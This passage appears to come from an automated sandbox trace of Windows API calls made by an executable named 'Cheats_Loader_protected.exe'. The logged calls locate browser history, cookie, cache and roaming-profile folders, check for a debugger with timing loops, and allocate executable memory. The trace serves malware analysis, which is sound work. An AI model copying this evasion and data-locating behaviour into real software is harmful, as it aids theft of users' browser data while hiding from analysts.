psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history\\", len=0x38 | out: pbstr=0xe228c8*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0052.477] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 0x0 [0052.478] SysReAllocStringLen (in: pbstr=0x13ffca8*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies", len=0x3b | out: pbstr=0x13ffca8*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 1 [0052.478] SysReAllocStringLen (in: pbstr=0x13ffcac*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", len=0x3c | out: pbstr=0x13ffcac*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 1 [0052.478] GetThreadLocale () returned 0x409 [0052.478] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.478] GetThreadLocale () returned 0x409 [0052.478] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.478] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", lpFilePart=0x13ff9fc*=0x0) returned 0x3c [0052.479] SysReAllocStringLen (in: pbstr=0x13ffcac*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", len=0x3c | out: pbstr=0x13ffcac*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 1 [0052.479] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", len=0x3c | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 1 [0052.479] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", cchLength=0x3c | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies\\") returned 0x3c [0052.479] SysReAllocStringLen (in: pbstr=0x13ffcac*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies\\", len=0x3c | out: pbstr=0x13ffcac*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies\\") returned 1 [0052.479] SysReAllocStringLen (in: pbstr=0xe228cc*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies\\", len=0x3c | out: pbstr=0xe228cc*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies\\") returned 1 [0052.479] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache") returned 0x0 [0052.480] SysReAllocStringLen (in: pbstr=0x13ffc9c*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache", len=0x39 | out: pbstr=0x13ffc9c*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache") returned 1 [0052.480] SysReAllocStringLen (in: pbstr=0x13ffca0*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", len=0x3a | out: pbstr=0x13ffca0*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\") returned 1 [0052.480] GetThreadLocale () returned 0x409 [0052.480] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.480] GetThreadLocale () returned 0x409 [0052.480] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.480] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", lpFilePart=0x13ff9fc*=0x0) returned 0x3a [0052.480] SysReAllocStringLen (in: pbstr=0x13ffca0*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", len=0x3a | out: pbstr=0x13ffca0*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\") returned 1 [0052.480] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", len=0x3a | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\") returned 1 [0052.480] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", cchLength=0x3a | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache\\") returned 0x3a [0052.480] SysReAllocStringLen (in: pbstr=0x13ffca0*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache\\", len=0x3a | out: pbstr=0x13ffca0*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache\\") returned 1 [0052.480] SysReAllocStringLen (in: pbstr=0xe228d0*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache\\", len=0x3a | out: pbstr=0xe228d0*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache\\") returned 1 [0052.480] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming") returned 0x0 [0052.482] SysReAllocStringLen (in: pbstr=0x13ffc90*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Roaming", len=0x1f | out: pbstr=0x13ffc90*="C:\\Users\\FD1HVy\\AppData\\Roaming") returned 1 [0052.482] SysReAllocStringLen (in: pbstr=0x13ffc94*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Roaming\\", len=0x20 | out: pbstr=0x13ffc94*="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned 1 [0052.482] GetThreadLocale () returned 0x409 [0052.482] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.482] GetThreadLocale () returned 0x409 [0052.482] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.482] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\", lpFilePart=0x13ff9fc*=0x0) returned 0x20 [0052.482] SysReAllocStringLen (in: pbstr=0x13ffc94*="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz="C:\\Users\\FD1HVy\\AppData\\Roaming\\", len=0x20 | out: pbstr=0x13ffc94*="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned 1 [0052.482] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Roaming\\", len=0x20 | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned 1 [0052.482] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Roaming\\", cchLength=0x20 | out: lpsz="c:\\users\\fd1hvy\\appdata\\roaming\\") returned 0x20 [0052.482] SysReAllocStringLen (in: pbstr=0x13ffc94*="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz="c:\\users\\fd1hvy\\appdata\\roaming\\", len=0x20 | out: pbstr=0x13ffc94*="c:\\users\\fd1hvy\\appdata\\roaming\\") returned 1 [0052.483] SysReAllocStringLen (in: pbstr=0xe228d4*=0x0, psz="c:\\users\\fd1hvy\\appdata\\roaming\\", len=0x20 | out: pbstr=0xe228d4*="c:\\users\\fd1hvy\\appdata\\roaming\\") returned 1 [0052.483] VirtualFree (lpAddress=0xe34000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0052.484] GetVersion () returned 0x23f00206 [0052.484] GetCurrentProcessId () returned 0x13d8 [0052.484] GetCurrentProcess () returned 0xffffffff [0052.484] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe\" " [0052.484] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe\" " [0052.484] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe\" " [0052.484] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe\" " [0052.484] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.485] RtlDosPathNameToNtPathName_U (in: DosPathName="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", NtPathName=0x13ffc44, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0052.485] NtCreateFile (in: FileHandle=0x13ffc54, DesiredAccess=0x80100080, ObjectAttributes=0x13ffc28*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x13ffc4c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x13ffc54*=0x240, IoStatusBlock=0x13ffc4c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0052.485] RtlFreeAnsiString (AnsiString="\\") [0052.485] NtSetInformationFile (FileHandle=0x240, IoStatusBlock=0x13ffc50, FileInformation=0x13ffc48, Length=0x8, FileInformationClass=0xe) returned 0x0 [0052.485] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffe5c, BufferLength=0x40, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffe5c*) returned 0x0 [0052.486] NtSetInformationFile (FileHandle=0x240, IoStatusBlock=0x13ffc50, FileInformation=0x13ffc48, Length=0x8, FileInformationClass=0xe) returned 0x0 [0052.486] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffe48, BufferLength=0x14, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffe48*) returned 0x0 [0052.486] NtSetInformationFile (FileHandle=0x240, IoStatusBlock=0x13ffc50, FileInformation=0x13ffc48, Length=0x8, FileInformationClass=0xe) returned 0x0 [0052.486] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffd68, BufferLength=0xe0, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffd68*) returned 0x0 [0052.486] NtSetInformationFile (FileHandle=0x240, IoStatusBlock=0x13ffc50, FileInformation=0x13ffc48, Length=0x8, FileInformationClass=0xe) returned 0x0 [0052.486] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40*) returned 0x0 [0052.486] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40*) returned 0x0 [0052.486] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40*) returned 0x0 [0052.487] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40*) returned 0x0 [0052.487] NtReadFile (in: FileHandle=0x240, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x13ffc4c, Buffer=0x13ffd40*) returned 0x0 [0052.487] NtClose (Handle=0x240) returned 0x0 [0052.502] GetCurrentThreadId () returned 0x13dc [0052.502] VirtualAlloc (lpAddress=0xe34000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x40) returned 0xe34000 [0052.506] GetTickCount () returned 0x114eb7a [0052.506] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14826157858) returned 1 [0052.506] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14826166363) returned 1 [0052.506] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14826173676) returned 1 [0052.506] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14826180779) returned 1 [0052.506] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14826187899) returned 1 [0052.506] Sleep (dwMilliseconds=0x0) [0052.565] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14832061521) returned 1 [0052.565] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14832070121) returned 1 [0052.565] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14832077430) returned 1 [0052.565] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14832084952) returned 1 [0052.565] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14832092098) returned 1 [0052.565] Sleep (dwMilliseconds=0x0) [0052.576] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833173451) returned 1 [0052.576] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833182053) returned 1 [0052.576] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833189509) returned 1 [0052.576] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833196617) returned 1 [0052.576] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833235853) returned 1 [0052.577] Sleep (dwMilliseconds=0x0) [0052.583] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833917897) returned 1 [0052.584] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833926030) returned 1 [0052.584] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833933671) returned 1 [0052.584] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833941013) returned 1 [0052.584] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe14 | out: lpPerformanceCount=0x13ffe14*=14833948379) returned 1 [0052.584] Sleep (dwMilliseconds=0x0) [0052.609] GetTickCount () returned 0x114ebe8 [0052.609] VirtualFree (lpAddress=0xe54000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0052.610] VirtualAlloc (lpAddress=0xe54000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xe54000 [0052.612] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9f4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.612] RtlUnwind (TargetFrame=0x13ffe48, TargetIp=0xa9d98c, ExceptionRecord=0x13ff2d8, ReturnValue=0x0) [0052.613] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9f4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.613] RtlUnwind (TargetFrame=0x13ffe48, TargetIp=0xa9d98c, ExceptionRecord=0x13ff2d8, ReturnValue=0x0) [0052.613] VirtualAlloc (lpAddress=0xe64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0052.615] VirtualFree (lpAddress=0xe64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0052.616] VirtualAlloc (lpAddress=0xe64000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0052.618] VirtualFree (lpAddress=0xe64000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0052.619] VirtualAlloc (lpAddress=0xe64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0052.619] VirtualFree (lpAddress=0xe64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.622] GetCurrentThreadId () returned 0x13dc [0052.623] GetCurrentThreadId () returned 0x13dc [0052.623] GetCurrentThreadId () returned 0x13dc [0052.623] GetCurrentThreadId () returned 0x13dc [0052.623] GetCurrentThreadId () returned 0x13dc [0052.623] GetCurrentThreadId () returned 0x13dc [0052.623] GetCurrentThreadId () returned 0x13dc [0052.623] VirtualFree (lpAddress=0xe54000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0052.625] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.625] GetProcAddress (hModule=0x772d0000, lpProcName="CheckRemoteDebuggerPresent") returned 0x772e42f0 [0052.625] GetLocalTime (in: lpSystemTime=0x13ffe18 | out: lpSystemTime=0x13ffe18*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0x38)) [0052.625] GetTimeZoneInformation (in: lpTimeZoneInformation=0x13ffd68 | out: lpTimeZoneInformation=0x13ffd68) returned 0x1 [0052.625] GetLocalTime (in: lpSystemTime=0x13ffe18 | out: lpSystemTime=0x13ffe18*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0x38)) [0052.625] GetTimeZoneInformation (in: lpTimeZoneInformation=0x13ffd68 | out: lpTimeZoneInformation=0x13ffd68) returned 0x1 [0052.626] GetTickCount () returned 0x114ebf7 [0052.626] GetTickCount () returned 0x114ebf7 [0052.629] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.630] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.630] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.630] GetModuleFileNameW (in: hModule=0xa90000, lpFilename=0x6ce34, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0052.630] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x104, lpBuffer=0x13ff97c, lpFilePart=0x13ff978 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x13ff978*="Cheats_Loader_protected.exe") returned 0x33 [0052.630] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFindFileData=0x13ffbd4 | out: lpFindFileData=0x13ffbd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd3fb80, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x5fd3fb80, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x5e0a3800, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x11de00, dwReserved0=0x12d0000, dwReserved1=0x743b9fc4, cFileName="Cheats_Loader_protected.exe", cAlternateFileName="CHEATS~1.EXE")) returned 0x69eb0 [0052.631] FileTimeToLocalFileTime (in: lpFileTime=0x13ffbe8, lpLocalFileTime=0x13ffb70 | out: lpLocalFileTime=0x13ffb70) returned 1 [0052.631] FileTimeToDosDateTime (in: lpFileTime=0x13ffb70, lpFatDate=0x13ffbb6, lpFatTime=0x13ffbb4 | out: lpFatDate=0x13ffbb6, lpFatTime=0x13ffbb4) returned 1 [0052.631] SysReAllocStringLen (in: pbstr=0x13ffbac*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\", len=0x18 | out: pbstr=0x13ffbac*="C:\\Users\\FD1HVy\\Desktop\\") returned 1 [0052.631] SysReAllocStringLen (in: pbstr=0x13ffba4*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ffba4*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0052.631] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchLength=0x33 | out: lpsz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 0x33 [0052.631] SysReAllocStringLen (in: pbstr=0x13ffe90*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0x13ffe90*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0052.631] SysReAllocStringLen (in: pbstr=0xbec578*=0x0, psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0xbec578*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0052.632] SysReAllocStringLen (in: pbstr=0xe6004c*=0x0, psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0xe6004c*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0052.632] SysReAllocStringLen (in: pbstr=0xe6005c*=0x0, psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0xe6005c*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.632] SysReAllocStringLen (in: pbstr=0x13ffe0c*=0x0, psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0x13ffe0c*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.632] CharLowerBuffW (in: lpsz="c:\\users\\fd1hvy\\desktop\\", cchLength=0x18 | out: lpsz="c:\\users\\fd1hvy\\desktop\\") returned 0x18 [0052.632] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.632] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.632] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="users", len=0x5 | out: pbstr=0xe2267c*="users") returned 1 [0052.633] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.633] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="desktop", len=0x7 | out: pbstr=0xe20818*="desktop") returned 1 [0052.633] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="users", lpUsedDefaultChar=0x0) returned 5 [0052.633] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvy", lpUsedDefaultChar=0x0) returned 6 [0052.633] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="desktop", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop", lpUsedDefaultChar=0x0) returned 7 [0052.633] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.633] SysReAllocStringLen (in: pbstr=0x13ffe10*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffe10*="c:\\") returned 1 [0052.634] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.634] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x69e70 [0052.634] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.634] GetLastError () returned 0x12 [0052.634] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.634] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: 